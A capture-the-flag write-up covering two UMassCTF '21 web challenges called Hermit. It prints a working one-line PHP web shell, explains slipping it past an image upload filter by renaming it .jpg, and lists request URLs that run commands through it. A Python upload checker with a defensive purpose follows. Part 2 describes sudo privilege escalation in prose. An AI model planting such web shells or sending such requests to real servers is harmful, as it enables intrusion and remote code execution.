UMassCTF ’21: Web: Hermit – Part 1

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

I quickly test the image upload to see how it works:

It uploaded the file and gave a link to see it. When I click the link to see it, it essentially prints the contents of the file as if it is text:

This tells me that I need to upload a PHP shell script:

I grab my favorite one-line PHP shell and upload it as a .php file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.

It took it:

When I click to see the “image” I get this:

Now I provide some commands as the expected “cmd” argument:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}
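
A defender-side check for the upload step above, added here as an example (it is not code from the challenge or its author): it rejects an upload when the content is not the image its extension claims, or when it contains a PHP open tag. The function names, reason strings and sample bytes are constructed for illustration.

```python
import os
import re

# Leading bytes of the image formats an upload form would normally accept.
IMAGE_MAGIC = {"jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
EXT_TO_KIND = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}
# "<?php" and the short echo tag "<?=". In a large binary file a hit can be
# coincidental, so treat it as a reason to quarantine and review.
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)


def sniff_kind(data: bytes):
    """Return the image kind the content really starts with, or None."""
    for kind, magic in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def inspect_upload(filename: str, data: bytes):
    """Return the list of reasons to reject an upload; empty means accept."""
    reasons = []
    ext = os.path.splitext(filename)[1].lower()
    claimed = EXT_TO_KIND.get(ext)
    if claimed is None:
        reasons.append("extension not in image allow-list")
    actual = sniff_kind(data)
    if actual is None:
        reasons.append("content is not a recognised image")
    elif claimed is not None and actual != claimed:
        reasons.append("extension does not match content")
    # A genuine image header says nothing about the rest of the file,
    # so the whole body is scanned, not just the first bytes.
    if PHP_TAG.search(data):
        reasons.append("PHP open tag in content")
    return reasons


# Constructed samples (not taken from the challenge server).
PAYLOAD = b"<?php echo 'x'; ?>"
JPEG_HEAD = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SAMPLES = {
    "script.php": PAYLOAD,                  # rejected on extension alone
    "script.jpg": PAYLOAD,                  # the rename described in the writeup
    "header.jpg": JPEG_HEAD + PAYLOAD,      # real JPEG header, PHP in the body
    "photo.jpg": JPEG_HEAD + b"\xff\xd9",   # benign
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, inspect_upload(name, blob) or "accept")
```

Content checks like this are one layer only: the viewer script should also return stored files as inert data rather than passing them to the PHP interpreter.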

UMassCTF ’21: Web: Hermit – Part 2

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Hint 1:

Hint 2:

Going to the provided link in my browser, I get an invalid response error:

I then decide to netcat to that port to see what I can get:

Ahh, this is an SSH port.

Thinking back to the previous Hermit challenge, I notice this is the same IP, just a different port.

I go back to my one-line PHP shell that I uploaded and poke around some more.

I decide to run whoami to see what user I am:

Now I check sudo -l to see what hermit can do:

Ahh, that looks interesting. I run that command:

That made it easy!

UMASS{a_test_of_integrity}